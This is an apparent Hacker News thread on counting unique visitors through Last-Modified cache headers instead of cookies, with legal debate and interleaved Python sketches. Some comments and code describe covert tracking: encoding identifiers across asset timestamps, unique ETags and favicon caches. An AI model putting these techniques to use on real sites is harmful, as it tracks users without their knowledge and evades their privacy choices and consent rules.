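For anyone who hasn't seen it, here is a rough sketch of the HyperLogLog idea: hash each item, use the first few bits to pick a register, and keep only the longest run of leading zeros seen per register. The class name, the SHA-256 hash, and the `p=12` register count are illustrative choices, not anything from a particular library. What to feed it is left open, and whether those inputs count as identifiable information is a separate question; the structure itself keeps only the registers, not the hashes.

```python
import hashlib
import math


class HyperLogLog:
    """Approximate distinct counter; stores 2**p small integers, not the items."""

    def __init__(self, p: int = 12) -> None:
        self.p = p
        self.m = 1 << p
        self.registers = [0] * self.m

    def add(self, item: str) -> None:
        h = int.from_bytes(hashlib.sha256(item.encode()).digest()[:8], "big")
        idx = h >> (64 - self.p)                # first p bits pick a register
        rest = h & ((1 << (64 - self.p)) - 1)   # remaining 64 - p bits
        # rank = position of the leftmost 1-bit within the remaining bits
        rank = (64 - self.p) - rest.bit_length() + 1
        self.registers[idx] = max(self.registers[idx], rank)

    def estimate(self) -> float:
        alpha = 0.7213 / (1 + 1.079 / self.m)   # bias constant, valid for m >= 128
        raw = alpha * self.m * self.m / sum(2.0 ** -r for r in self.registers)
        zeros = self.registers.count(0)
        if raw <= 2.5 * self.m and zeros:
            return self.m * math.log(self.m / zeros)  # small-range correction
        return raw
```

Adding the same item twice never changes a register, which is why duplicates do not inflate the estimate. With 4096 registers the typical error is on the order of a couple of percent.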

genewitch · on Nov 30, 2022

Hi there, Marketing Company Intern!

Tell them you'd rather make the coffee ;-)

411111111111111 · on Nov 30, 2022

Ha, that would explain that question. My first reaction was mostly confusion as there is so much prior art at this point, i.e. fingerprinting through installed add-ons, resolution/window size/system language, browser language, IP locality etc. There are even demo pages around which show you just how unique your configuration is even without anything else.

https://amiunique.org/fp

yellow_lead · on Nov 30, 2022

Lol, I knew it would sound that way, but I don't work in this domain - just interested in privacy and this problem.

genewitch · on Nov 30, 2022

the only reason we could think of for wanting unique visitors was for the marketing people or investors/stakeholders/shareholders. Parsing the request logs should be sufficient for every other metric.

We had a bunch of meetings about this at what essentially amounted to a giant information superhighway billboard company. IIRC someone brought up using cache headers even back then, because it didn't require cookies or javascript, which we couldn't guarantee would be "up to date", this is back in "target IE6, still" days.

As one of my networking friends said, advertisers usually know everything about your metrics, even if you don't. You can't really fudge the numbers in your favor, so raw requests or QPS or whatever ancillary metric would be enough.

the method in the article is defeated by clearing your session when you're done browsing, or using incognito/private browsing tab, as that should mark all "cached" items for deletion.

Quarrelsome · on Nov 30, 2022

I thought GDPR cared mostly about uniquely identifying visitors which this does not do. You still need a cookie banner to state that you will put some data on their machine but you always need one of those.

jefftk · on Nov 30, 2022

> you always need one of those

The withcabin.com landing page claims you don't need consent banners to use it.

t0mas88 · on Nov 30, 2022

That claim is false in Europe. You need to ask permission for this approach, because you're storing something on the user's device (the generated date in the cache) that isn't strictly necessary. The ePrivacy directive says you need permission for that. Nowhere does the law specify "cookies"; it's about any kind of data stored on the user's device.

mgrund · on Nov 30, 2022

True it does not matter if it’s a cookie, or whatever. You need to look to the ePrivacy directive article 5.3 for which exemption case applies. In the case of timestamps, it would be case A :

> when the cookie is used “for the sole purpose of carrying out the transmission of a communication over an electronic communications network” (“Exemption A“)

Since the timestamp is no longer used solely for this purpose, you need consent.

jefftk · on Nov 30, 2022

Uh, yes? That's exactly what I've been saying upthread.

mulhoon · on Nov 30, 2022

Hi, author of the article here.

Just to give a little more background here.

Cabin doesn't store a row in a database for each visit. It only stores one row, per day per domain. The attributes for that row are simple tally counts - visits, uniques, bounces etc. So no identifier is stored, and the hits go into the tally. We do not store the fact that a user has visited x amount of times. The demo here is to show how the technique works.

Cabin used to detect only the presence of any last-modified date to determine if the visit is unique or not. But extending it to distinguish hits 1,2 and 3 (by adding 1 second to the start of the day) now allows us to count the bounce rates too.
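A rough sketch of how that could look on the server, as I read the description; this is not Cabin's actual code. The function name `handle_hit`, the tally keys, and the bounce bookkeeping (count a bounce on the first hit, take it back on the second) are assumptions for illustration.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Optional


def handle_hit(if_modified_since: Optional[str], now: datetime, tally: dict) -> str:
    """Update the day's tally and return the Last-Modified value to send back."""
    day_start = now.astimezone(timezone.utc).replace(
        hour=0, minute=0, second=0, microsecond=0
    )

    # Seconds past midnight in the echoed header encode hits already seen today.
    prior_hits = 0
    if if_modified_since:
        try:
            seen = parsedate_to_datetime(if_modified_since)
            offset = int((seen - day_start).total_seconds())
        except (TypeError, ValueError):
            offset = -1  # unparsable header: treat as a first visit
        if 0 <= offset < 86400:
            prior_hits = offset + 1  # headers from other days fall outside this range

    tally["views"] += 1
    if prior_hits == 0:
        tally["uniques"] += 1
        tally["bounces"] += 1   # assumed: a single-hit visit is a bounce...
    elif prior_hits == 1:
        tally["bounces"] -= 1   # ...until the same browser shows up again

    return format_datetime(day_start + timedelta(seconds=prior_hits), usegmt=True)
```

Everyone's first hit of the day gets the same `00:00:00` value, so the only thing the echoed header reveals is how many hits that browser has made today.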

jefftk · on Nov 30, 2022

Your landing page says "no cookies or consent banners" and "compliant with all privacy laws", but the timestamp approach stores data on a user's computer in a way that is not "strictly necessary in order to provide an information society service explicitly requested by the subscriber or user". Could you explain how you see your approach as compliant with the ePrivacy directive?

Full text: https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CEL...

Guidance: https://ec.europa.eu/justice/article-29/documentation/opinio...

slashdev · on Dec 2, 2022

So the moral of the story is to use passive fingerprinting that is able to identify and track individual users, because then you can skip the cookie banner and be compliant with the law?

I think I would rather use this and rely on the courts to interpret it fairly if it ever came to that, which it won't.

IshKebab · on Nov 30, 2022

Yeah this is just a cookie by another name. Probably already used by supercookies.

The GDPR doesn't single out cookies so you can't get around it by using a different storage device.

jefftk · on Nov 30, 2022

> The GDPR doesn't single out cookies so you can't get around it by using a different storage device.

Quibble: this isn't a GDPR issue, it's an ePrivacy issue. Two different regulations.

lolinder · on Nov 30, 2022

Thanks for sharing!

I personally don't have an issue with it, but one thing that might set some of the people here at ease is if you stopped incrementing the timestamp after the second visit.

This would give you three possible states anyone could be in: never visited, visited once, and visited more than once. It's less data, but still enough to give you your bounce rate and your total visits while minimizing the number of boxes you're sorting individual visitors into.
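To make the three-state idea concrete, here is a small sketch of a capped counter. The names `next_offset` and `describe` are hypothetical, and the offset is the number of seconds past midnight stored in the timestamp.

```python
from typing import Optional

MAX_OFFSET = 1  # offsets 0 and 1 only: "visited once" and "visited more than once"


def next_offset(seen_offset: Optional[int], max_offset: int = MAX_OFFSET) -> int:
    """Offset to send back, given the offset the browser echoed (None if absent)."""
    if seen_offset is None:
        return 0                                 # first visit of the day
    return min(seen_offset + 1, max_offset)      # stop counting at the cap


def describe(seen_offset: Optional[int]) -> str:
    """The only three things the server can learn from a capped counter."""
    if seen_offset is None:
        return "never visited"
    return "visited once" if seen_offset == 0 else "visited more than once"
```

Raising `max_offset` trades a coarser picture for a finer one; at the default, a visitor on their 3rd hit and one on their 500th look identical.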

Terretta · on Dec 1, 2022

How do you distinguish two users with the same date stamp, to know they are two diff visitors?

    User A: last-modified: Wed, 30 Nov 2022 00:00:00 GMT
    User A: last-modified: Wed, 30 Nov 2022 00:00:01 GMT
    User B: last-modified: Wed, 30 Nov 2022 00:00:00 GMT
    User B: last-modified: Wed, 30 Nov 2022 00:00:01 GMT

Next you see:

    User ?: last-modified: Wed, 30 Nov 2022 00:00:02 GMT

Which user is it?

And have you had 2 count of visits, or 3 count? How do you know?

Finally, these aren't really counting visitors, but views, of this URL, by this browser, right?

There's a conventional taxonomy of terms for web stats, something like:

    - users (as in MAU)
    - visitors or uniques (typically daily uniques)
    - visits or sessions (multiple views from one visitor in a cluster)
    - views or pageviews (.html pages)
    - hits or requests (every object gotten from server: .html, .js, .jpg, etc.)

Looks like your GIST is causing a remote user agent to store a count of its own views.

// I haven't tried it, just a quick skim of the blog and the gist, raising this question. I'm probably missing something.

jrmg · on Dec 1, 2022

How I'm interpreting their explanations is that they don't (can't) tell which user it is. They just know you've had two two-time visitors, and one one-time visitor.

ohbtvz · on Nov 30, 2022

Have lawyers familiar with EU law vetted your technique? Could you share their legal reasoning? If not, why would anyone ever take the risk to use your product and face huge fines?

senko · on Nov 30, 2022

(Not OP)

I am all for privacy, use uBO, Firefox Focus / Incognito and Google alternatives. But if I have to consult a lawyer each time I write some code or write up a blog post, I'll take up gardening instead.

rcoveson · on Nov 30, 2022

How about just consulting a lawyer each time you abuse a protocol to get user's software to behave in a way that is invisible to them and benefits you?

There is already a correct way to tell a browser to tell the server something with each subsequent request: Cookies. Nobody needs to "write some code" here; it's already written. Working around the protocol isn't engineering, it's just lying.

This blog post is just another cynical degradation of trust between users and their browsers, and browsers and the servers they talk to. Just another part of HTTP that we can't use for what it was designed for anymore because servers want so desperately to track visitors uniquely and a significant subset of visitors would prefer not to be remembered uniquely.

slashdev · on Dec 2, 2022

It doesn't track visitors. It just counts how many came back and how many bounced. It's very privacy friendly, but still doesn't meet your standards? I think you just like to complain.

rcoveson · on Dec 3, 2022

This is simple. Why not use cookies? Because people don’t like cookies, or people delete cookies, or there are regulations surrounding cookies. So we’re doing what cookies are for with a different part of the protocol to circumvent all those issues.

Though, of course, it doesn’t circumvent any of them. Nobody who firmly rejects cookies is amused, and no court that ever made a cookie-consent law will shrug its shoulders and say “technically it’s not a cookie so I guess they’re in the clear”.

It’s ridiculous to call this privacy friendly, and I think you just like to track your users without asking.

slashdev · on Dec 4, 2022

It is privacy friendly and it's not tracking users. I think you like to complain about things you don't understand.

rcoveson · on Dec 4, 2022

Instead of putting a real, appropriate value in "last-modified", we're putting an arbitrary value, totally unrelated to actual response caching that the user's browser will unwittingly use next time it calls us and in so doing remind us of something about them. Maybe all it reminds us of is visit count, because we have restraint and that's all we're exploiting this for (for now). So now, for the third time:

Why not use a cookie?

The problem with this is encoded in the answer to that question. You're being willfully ignorant if you can't see that the answer to that question is: "Because I don't like certain governments, users, and user agents' way of handling cookies (e.g. deleting them, or requiring consent)".

slashdev · on Dec 4, 2022

So you agree it doesn't track users. At least we're on the same page there now.

Why not use a cookie? Because then they can't advertise that they don't use cookies. It's like how they put No-GMO label on food that doesn't even have GMO crop varieties. It's meaningless, but people are uneducated on the subject so it sells products.

You could use a cookie here, and you could do it completely legally without requiring consent. The laws don't care about cookies or other technical implementations, they care about tracking. So the reason to use this cache header instead of cookies is simply because people are uninformed on the subject and it sells better this way.

rcoveson · on Dec 5, 2022

> Why not use a cookie? Because then they can't advertise that they don't use cookies.

Oh, so they can be craven motherfuckers who abuse protocols for the sake of web analytics. With you so far.

> The laws don't care about cookies or other technical implementations, they care about tracking.

This is flat-out wrong. The law cares about any cookies that aren't strictly necessary for the site's operation. This very well might qualify as a cookie that isn't strictly necessary for the site's operation. It's not implemented as a cookie, but what you say is half right; "the laws don't care about... technical implementations". A judge might not care that you've come up with a clever way of storing your cookie with a different header. It's the same thing as a cookie, and it's not necessary for the site's operation.

slashdev · on Dec 5, 2022

Even the good guys are craven motherfuckers to you. Who does measure up to your standards of flawless perfection?

This is an analytics service that respects user privacy. We should be wishing them all the success in the world, not criticizing them for not meeting your ridiculous notions of HTTP header purity.

rcoveson · on Dec 5, 2022

What a ridiculous notion! Using cookies when you want to set a cookie! Absurd! What we are trying to do is set a cookie while also proclaiming to the world that we don’t use cookies. What’s the matter with that?

I’m sorry, but “I want to sort of lie” is just not a very compelling reason to me. I guess I just have ridiculously high standards.

ohbtvz · on Nov 30, 2022

No need for this kind of hyperbole. I wouldn't ask this question if the OP's post didn't contain grandiose claims such as "No cookies, no consent banners, no ad networks, 100% GDPR & CCPA compliant, low footprint web analytics." OP made a claim about their compliance with EU law. I'm asking for proof or at least an explanation.

jefftk · on Nov 30, 2022

The OP is a "privacy-first web analytics" company; this is totally something they should be asking their lawyers.

Note that they list the GDPR on their "Privacy law compliance" page (https://docs.withcabin.com/privacy.html) but not ePrivacy...

glenjamin · on Nov 30, 2022

I think the comments on this post would probably be less hostile if the title said something like "detect the number of unique visitors", which is what I believe it's doing, rather than detecting unique visitors using unique timestamps, which is what many seem to be guessing based on the headline alone.

tedunangst · on Nov 30, 2022

Your personal visit count is embedded in the seconds.

lisper · on Nov 30, 2022

Yes, but not your identity.

michaelbuckbee · on Nov 30, 2022

They're using this to track number of unique visits from a single user to a site.

Thorrez · on Nov 30, 2022

Yes, but I think they're not tracking anything else about the user besides number of visits. E.g. they're not tracking ip I don't think.

And I think they are only doing it within a single day, not across days.

If you know that someone exists who visited your site 500 times today, but know nothing else about the person, is that a privacy problem?

andix · on Nov 30, 2022

It would be interesting if it is also possible to abuse it. If it is possible to create enough unique timestamps, that browsers still accept them. Can you add milliseconds to the TS, and do browsers store them too? Or do browsers also accept timestamps from months or years back and re-send them? If you can use the whole scale of Unix time (int32), there is a huge pool of entropy available.

In this case they don’t do this evil thing, and it probably would still violate the European GDPR, even if it’s not an actual cookie, but somebody has to find it first.

kapep · on Nov 30, 2022

Even without millisecond precision, you could embed multiple assets that are served with slightly different timestamps to encode a unique identifier.
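A quick back-of-the-envelope sketch of why that matters, assuming each asset's timestamp can carry one of `base` distinct second offsets. The function names and the base of 60 are made up for illustration; the point is only how fast the capacity grows with the number of assets.

```python
import math
from typing import List


def encode_id(value: int, assets: int, base: int = 60) -> List[int]:
    """Split an integer into one second-offset per asset (little-endian digits)."""
    if not 0 <= value < base ** assets:
        raise ValueError("value does not fit in the available assets")
    digits = []
    for _ in range(assets):
        value, digit = divmod(value, base)
        digits.append(digit)
    return digits


def decode_id(offsets: List[int], base: int = 60) -> int:
    """Recombine the per-asset offsets echoed back by the browser."""
    return sum(digit * base ** i for i, digit in enumerate(offsets))


def capacity_bits(assets: int, base: int = 60) -> float:
    """How many bits of identifier fit across the given number of assets."""
    return assets * math.log2(base)
```

With only a handful of assets the capacity already exceeds 32 bits, which is why a per-visitor timestamp scheme would be a very different thing from the shared counter described in the article.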

jakobdabo · on Nov 30, 2022

ETag (paired with If-None-Match header sent by the browsers) is another caching header to be aware of.

https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET...

doomrobo · on Nov 30, 2022

Ooh that's kinda evil. A server could give a client a uniquely identifying ETag for a given URL. So whenever the client comes back on the same browser, they're identified.

Fortunately this is probably just as detectable as the Last-Modified abuse in the post.

bawolff · on Nov 30, 2022

There are a lot of things like that. Although browsers changed it recently, you also used to be able to use TLS session tickets.

Another one was the favicon cache.

Pretty much any state on the browser can be used to track people.

jahewson · on Nov 30, 2022

The fact that this is being used in an analytics product that claims to be compliant with all privacy laws is horrifying. There’s no way this is compliant and it’s deceptive.

pyrolistical · on Nov 30, 2022

Please explain why this isn’t compliant?

whartung · on Nov 30, 2022

Arguably this can become personally identifiable, much like a person's height of 7 feet becomes personally identifiable. How many 7 foot people live in Elko Nevada? (I have no idea, perhaps there's an entire colony of them.) But most very tall people, well, stand out. "You're that tall guy from Elko!"

Early on, it's not personally identifiable. No doubt there can be a lot of folks visiting the site only 10 times and never again.

But as someone continues to visit, they begin to narrow down who they are to "You're that guy that comes in here every day with a yellow hat". They may not "know" who you are but, they "know" who you are.

Eventually, there may be that one person that has the highest hit rate, who always stands out.

jefftk · on Nov 30, 2022

> there may be that one person that has the highest hit rate, who always stands out.

They could stop incrementing once they get to 10 (or something that's high but common enough to be shared by 1,000s of people).

Spivak · on Nov 30, 2022

> You're that guy that comes in here every day with a yellow hat

Yes but you have absolutely nothing at all to associate that back to a person. Where are you going to find the data "personal information of some kind of the people who visit your site a lot?" You're not collecting it.

jahewson · on Nov 30, 2022

See my reply to b34r. In addition assigning users into “anonymous” cohorts is a similar principle to FLoC which is likely not GDPR compliant https://searchengineland.com/googles-current-floc-tests-aren...

dahfizz · on Nov 30, 2022

> Processing personal data to generate the cohort assignment without the proper consent could also be a violation

Using personal data to assign a cohort counts as using personal data. Duh. The approach described in the article doesn't use any personal data, though?

bryant · on Nov 30, 2022

> Using personal data to assign a cohort counts as using personal data. Duh. The approach described in the article doesn't use any personal data, though?

Quoting the European commission:

"Personal data is any information that relates to an identified or identifiable living individual. Different pieces of information, which collected together can lead to the identification of a particular person, also constitute personal data."

I'd hazard a guess that it's the second part under which the EC might find this to be within scope.

dahfizz · on Nov 30, 2022

If I gave you a list of all the last-modified headers from a day, how would you use that information to identify a person?

ATsch · on Nov 30, 2022

The definition of personal data under the GDPR is anything that can be used to uniquely identify a natural person (with sufficiently high probability). Both cookies and date-modified meet that definition identically, as do IP addresses.

That doesn't mean you can't use it at all. It just places strong restrictions on what purposes you can use it for. The important point is just that those restrictions are the same under GDPR for all of these technologies. It doesn't matter how you uniquely identify users, what matters is what you do with that information.

dahfizz · on Nov 30, 2022

They don't assign a unique date-modified to each user. They assign everyone the same date modified on their first visit of the day. I don't accept that this could be used to uniquely identify a natural person.

You may be able to look at the headers and see that a certain user made the most requests that day. That still tells you nothing about their identity.

mytailorisrich · on Nov 30, 2022

Nothing in the technique described here allows identifying an individual directly or indirectly because 'identifiers' are not unique and really no different than standard 'last-modified' dates. Even if they were unique, further data would have to be collected in order to be able to identify individuals and turn everything into personal data.

What the technique may fall foul of, though, are cookie laws.

Spivak · on Nov 30, 2022

You can't just scare quotes anonymous without explaining how it could deanonymize you. You're sitting there with full access to the count data they collect. Use any statistical methods you like, figure out what visits were me.

tobr · on Nov 30, 2022

That seems very different, as those cohorts are based on actual personal data (correct me if I’ve misunderstood this about FLoC). That’s fundamentally different from a counter I think.

jahewson · on Nov 30, 2022

Yes that’s right, FLoC is explicitly using personal data. But now consider that that data is “you visited a gardening website in the past month” and compare it with “you visited this website 3 times yesterday” and the two methods don’t look so different.

tobr · on Nov 30, 2022

I guess we all have different instincts when it comes to this, but I find it much more expected and acceptable that a website can see that I’m returning, than that they get to know about random other interests I have based on my general browsing history.

mytailorisrich · on Nov 30, 2022

The article you quote does not suggest that "assigning users into “anonymous” cohorts is ... is likely not GDPR compliant" and I fail to see how that would be the case. Rather it seems to mention concerns that processing personal data to do so may be problematic.

bpfrh · on Nov 30, 2022

Because the GDPR isn't about any specific technology, but concerns any processing of personal data:

https://gdpr.eu/what-is-gdpr/

Edit: Huh, I stand corrected I don't know if this would count as personal data.

eurasiantiger · on Nov 30, 2022

Storing a cache header is not an issue, but if it is used as a unique identifier for user analytics purposes, it is almost certainly personally identifying information, at least after combining with other data. Since they are not disclosing that they store something they use to ID users, it is likely a GDPR violation, at least in spirit, and that spirit is exactly what GDPR seeks to control.

bonestamp2 · on Nov 30, 2022

> after combining with other data

The post says that they don't combine datapoints because that would negate privacy.

eurasiantiger · on Nov 30, 2022

They don’t but anyone using their service could.

ATsch · on Nov 30, 2022

It is personal data regardless of how it is used. The only question is if that use of personal data is permissible.

Using it for user analytics, which is neither required to run the service, nor in the user's interest, nor reasonably expected by the user, is almost definitely illegitimate use.

XCSme · on Dec 2, 2022

I assume because it stores persistent data on the user's PC without consent (last-modified), just like a cookie.

erdos4d · on Nov 30, 2022

This is a form of data collection and tracking that is definitely against GDPR unless the user is informed of it and consents to it. As it stands, there is no such notification or consent. IANAL but I strongly suspect this will get you fined in the EU.

pyrolistical · on Nov 30, 2022

What personal information is being collected here?

erdos4d · on Nov 30, 2022

GDPR doesn't just cover personal info, it also forbids tracking without consent, which includes cookies and other means. This is just a technical trick to track someone sans cookie, so I'm 100% certain they will fine anyone doing it unless they get consent.

LegionMammal978 · on Dec 1, 2022

The GDPR is entirely about personal data stored by the processor [0]. In principle, if the tracking is entirely client-side, and never produces any traces in how the client accesses your server, then the GDPR alone has no ability to stop it. (Not to say that it cannot run afoul of other regulations.) If the results of the tracking are somehow sent back to your server, then it most likely becomes personal data subject to the GDPR.

[0] https://gdpr-text.com/read/article-1/

b34r · on Nov 30, 2022

Why? It’s anonymous and doesn’t collect any user data other than IP and stuff from the user agent

jahewson · on Nov 30, 2022

It’s not anonymous in a low-entropy situation. A user can be indirectly identified. This would violate GDPR.

pyrolistical · on Nov 30, 2022

I don’t see how it can be used as described to identify an individual person.

Multiple requests end up with the same time stamp, which means individuals are not traceable but, as an aggregate, countable.

jahewson · on Nov 30, 2022

Only multiple requests within a given second get the same time stamp. So if you have less than 86k hits per day, then all your time stamps could be unique.

Edit: I misread the article here, where it said each visit incremented the counter by one second. So my calculation is not correct!

Thorrez · on Nov 30, 2022

No, they are truncating the timestamp to the day. So all visitors to the site on a specific day get the same initial timestamp.

jahewson · on Nov 30, 2022

Ah so they are, thanks! That’s much better. Though for a very, very low-traffic site this would still let me track unique visitors.

genewitch · on Nov 30, 2022

It is designed to track unique visitors, but not differentiate between them at all.

both you and i visit the same new site today, we both get a file our browser caches with today's date at 00:00:01. Tomorrow when we go to the same site, our browser says we got the file yesterday, so the server sends a new modified date to the browser, set to tomorrow's date at 00:00:02. Both of us have the same "new" file with the new modification date/time.

if i go back the following day, the only thing the server knows for certain, from just this header, is that i've visited twice before. So i'm not counted as a unique visitor.

That this could be used by assigning a unique timestamp to each visitor is where everyone's mind is going, and it feels like half are annoyed there's another way to leak information, and the other half are annoyed they didn't think of it prior to the end-of-year marketing bonus deadline.

Thorrez · on Dec 1, 2022

The technique could be used for a lot of tracking.

However, it sounds like they're using it just for quite minimal tracking. It sounds like the only thing they're tracking is how many people viewed the site how many times. They'll know that on a particular day, 1 person viewed the site 500 times, but won't know anything identifying about that person (e.g. IP, name, gender, any sort of unique ID).

dahfizz · on Nov 30, 2022

How do you go from timestamp to identifying someone?

~Every HTTP response has a Date field with a second-resolution timestamp that might be unique. Are you equally concerned about that?

bradstewart · on Nov 30, 2022

But how do I then tie that unique timestamp to an actual person? Which is what GDPR is concerned about.

(edit: spelling)

TylerE · on Nov 30, 2022

Birthday paradox means that will be far lower.
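To put a number on it, here is a small sketch under the assumption that each hit lands on a uniformly random second of an 86,400-second day (the per-second reading of the scheme, not what the article actually does). The function names are made up for illustration.

```python
def p_all_unique(hits: int, slots: int = 86_400) -> float:
    """Probability that `hits` uniformly random timestamps are all distinct."""
    p = 1.0
    for i in range(hits):
        p *= (slots - i) / slots
    return p


def hits_for_collision(prob: float = 0.5, slots: int = 86_400) -> int:
    """Smallest number of hits whose collision probability reaches `prob`."""
    hits = 0
    p_unique = 1.0
    while 1.0 - p_unique < prob:
        p_unique *= (slots - hits) / slots
        hits += 1
    return hits
```

Under that assumption a collision becomes more likely than not after only a few hundred hits, far below 86k.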

CaveTech · on Nov 30, 2022

No it wouldn't.

jahewson · on Nov 30, 2022

Yes it would because a unique time stamp allows me to indirectly identify a user.

kapep · on Nov 30, 2022

It is not a unique timestamp though. Each day, all visitors start at 00:00:00. All users that visit the site a second time get the timestamp 00:00:01 and so on.

CaveTech · on Nov 30, 2022

Where are people getting these insane reads of GDPR? Any bit of entropy is not going to violate GDPR. First, an active client-server connection is required for any kind of supposed "identity" contained here, which would of course include far more unique bits of identity/entropy, such as IP. Secondly, even if the full DB of page view counts were leaked you could not actually use it to identify a user.

You have somehow perverted GDPR to believe it to mean `no client may ever hold a unique state`. Good luck to anyone making a claim that this is NOT possible in anything but the most rudimentary application.

SparkyMcUnicorn · on Nov 30, 2022

andix · on Nov 30, 2022

I agree. Well crafted laws (like the GDPR) forbid any kind of tracking without consent. It’s the what and not the how. It doesn’t matter if it’s via cookies or any other way.

Isinlor · on Nov 30, 2022

This is really no different than a cookie - basically the same mechanism from the view of the server just different semantics.

pornel · on Nov 30, 2022

Important to note that privacy laws that regulate tracking are not limited to the Cookie header. They apply to tracking and data collection in general, regardless of how technically clever you make it.

dvko · on Nov 30, 2022

This is part of why I quit my privacy focused analytics start-up years ago. I won’t name it directly, but it was one of the first and is still going strong (although not really open-source anymore).

People kept asking for cookieless tracking but with another way of identifying returning visitors that was always worse from a privacy standpoint. Cookies can be controlled by the client, anything stored on the server can not.

Honestly, cookies are pretty nice, it’s the law around this that sucks. Tricks that attempt to bypass the laws will surely only work for a limited time, at least I hope they will…

legitster · on Nov 30, 2022

If anything, this is worse.

Cookies have built in browser behavior - they have limited scope, the browser lets you see them, they get cleared out regularly.

Abusing metadata is way sketchier.

eurasiantiger · on Nov 30, 2022

Chances are they aren’t the first to come up with something like this. How can we detect this kind of metadata abuse?

fanso99 · on Nov 30, 2022

perhaps randomize minutes/seconds of the "last-modified" header.

notpushkin · on Nov 30, 2022

Or perhaps just drop minutes/seconds. And maybe don't store the date altogether for files that are small enough?
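
A rough sketch of the "drop minutes/seconds" idea as a browser or proxy might apply it before sending `If-Modified-Since`. The function name `coarsen_http_date` is made up for illustration, and the trade-off is an assumption worth stating: a server that compares timestamps will often treat the coarsened value as stale and resend the resource.

```python
from datetime import timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Optional


def coarsen_http_date(value: str) -> Optional[str]:
    """Zero out minutes and seconds of an HTTP date; None if unparseable.

    Hypothetical helper, not part of any browser API.
    """
    try:
        dt = parsedate_to_datetime(value)
    except (TypeError, ValueError):
        return None  # caller can simply omit the header
    # Normalise to UTC so the value can be written back in GMT form.
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    else:
        dt = dt.astimezone(timezone.utc)
    dt = dt.replace(minute=0, second=0, microsecond=0)
    return format_datetime(dt, usegmt=True)


print(coarsen_http_date("Wed, 30 Nov 2022 00:00:07 GMT"))
```

With the seconds gone, a visit counter hidden in the low-order part of the timestamp collapses to the same value for everyone.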

pavon · on Nov 30, 2022

Exactly. They could have the same functionality and privacy characteristics if they simply kept a cookie that incremented each time the site was visited. The fact that they didn't go this route suggests this is more about finding a way to track unique visitors when cookies are disabled. They are deliberately subverting the user's desire to not be tracked and spinning it as a privacy win.

dahfizz · on Nov 30, 2022

If it was about tracking users, wouldn't they generate a unique timestamp per visitor on the first visit? Giving everyone the same timestamp is a terrible way to try and track individuals.

geocar · on Nov 30, 2022

Well, yes, you could have a cookie with C=C+1 and carefully set the expiration to the end of the day (like the article), or you could use randomly generated last-modified times and deduplicate server-side (similar to how cookies are usually used). But I can think of a few reasons the cache would give greater precision, so even if a lot of things are the same, I'm not so sure it's really "no different"; these things are pretty important to (some) publishers:

- third-party cookie blocking/notification features in browsers

- review processes on ad networks checking for actual cookies rather than suspicious last-modified times
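
For comparison, the cookie variant mentioned above (C=C+1, expiring at the end of the day) might look roughly like this. It is only a sketch: the function name `bump_counter_cookie` and the `Path=/` attribute are assumptions, and "end of the day" is taken to mean the next UTC midnight.

```python
from datetime import datetime, timedelta, timezone
from http.cookies import CookieError, SimpleCookie
from typing import Optional, Tuple


def bump_counter_cookie(cookie_header: Optional[str], now: datetime) -> Tuple[int, str]:
    """Return (new count, Set-Cookie value) for a per-day visit counter.

    Hypothetical helper; `now` must be a timezone-aware UTC datetime.
    """
    jar = SimpleCookie()
    try:
        jar.load(cookie_header or "")
    except CookieError:
        jar = SimpleCookie()  # malformed header: start over
    try:
        count = int(jar["C"].value) + 1 if "C" in jar else 1
    except ValueError:
        count = 1  # non-numeric value: treat as a first visit
    # Expire at the next UTC midnight so the counter resets daily.
    next_midnight = now.replace(hour=0, minute=0, second=0, microsecond=0) + timedelta(days=1)
    max_age = int((next_midnight - now).total_seconds())
    return count, f"C={count}; Max-Age={max_age}; Path=/"


now = datetime(2022, 11, 30, 23, 0, tzinfo=timezone.utc)
print(bump_counter_cookie("C=1", now))
```

The stored state is the same small integer either way; the difference is only in which browser mechanism carries it.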

ape4 · on Nov 30, 2022

Yes, cookies are a header field sent back by the browser and so is this.

habibur · on Nov 30, 2022

This can be used like a cookie without using cookies as long as the definition of a cookie stays "...a cookie is a small file stored on your computer".

You have 30 million seconds per year as unique identifier to be used against each individual for tracking. Even though the OP didn't do it.

Pick a timestamp anywhere between 10 years back and today, and you have 300m users tracked.
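
The arithmetic behind that estimate, as a quick sketch. This illustrates the hypothetical abuse habibur describes, not what the article's site does; the helper names and the choice of epoch are invented for the example, and leap days are ignored.

```python
import math
from datetime import datetime, timedelta, timezone

SECONDS_PER_YEAR = 365 * 24 * 60 * 60  # 31,536,000, ignoring leap days


def id_space(years: int) -> int:
    """Number of distinct second-resolution timestamps in `years` years."""
    return years * SECONDS_PER_YEAR


def id_to_timestamp(uid: int, epoch: datetime) -> datetime:
    """Encode a numeric visitor ID as a timestamp offset from `epoch`."""
    return epoch + timedelta(seconds=uid)


def timestamp_to_id(ts: datetime, epoch: datetime) -> int:
    """Recover the visitor ID from a timestamp produced above."""
    return int((ts - epoch).total_seconds())


epoch = datetime(2012, 11, 30, tzinfo=timezone.utc)  # arbitrary "10 years back"
print(id_space(10), round(math.log2(id_space(10)), 1))
print(timestamp_to_id(id_to_timestamp(123_456_789, epoch), epoch))
```

Ten years of seconds is a little over 315 million values, or about 28 bits, which is where the "300m users" figure comes from.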

superjan · on Nov 30, 2022

On the other hand, now that we know about it, it is easy to defeat: a privacy-conscious browser will just add a random number of minutes/seconds to the “if modified since” header. The only risk is that you sometimes trigger a reload because the resource was modified in that interval.

Kuinox · on Nov 30, 2022

It's harder, but you still leak bits of information. If the random function is known, statistical analysis can still leak out a bit of information.

a_c · on Nov 30, 2022

Looks like a nice middle ground between no tracking at all and needing full tracking to see how well your website performs. It seems no fingerprinting is involved, so the website visitor is anonymized. Unlike cookies, where we can store whatever we like, this method reveals only the unique visit and its derivatives.

legitster · on Nov 30, 2022

Am I missing something? Abusing the cache meta-data to store data on the user device seems much worse than a cookie.

I would have serious doubts of the longevity of such a trick, let alone some of the technical limitations I am sure the service has.

bonestamp2 · on Nov 30, 2022

The missing piece is that no fingerprint is involved. They don't have a way of identifying that user, but they are still able to count the number of times that visitor loads the page. So, it's not a tracker, it's a counter. It's like a loyalty punch card at your local sandwich shop -- they can track how many times you've been there by counting the hole punches, but they don't have a unique identifier, so they can't track details about those visits.

On the other hand, a cookie or a browser fingerprint contains info that can uniquely identify that user so it can be used for tracking.

legitster · on Nov 30, 2022

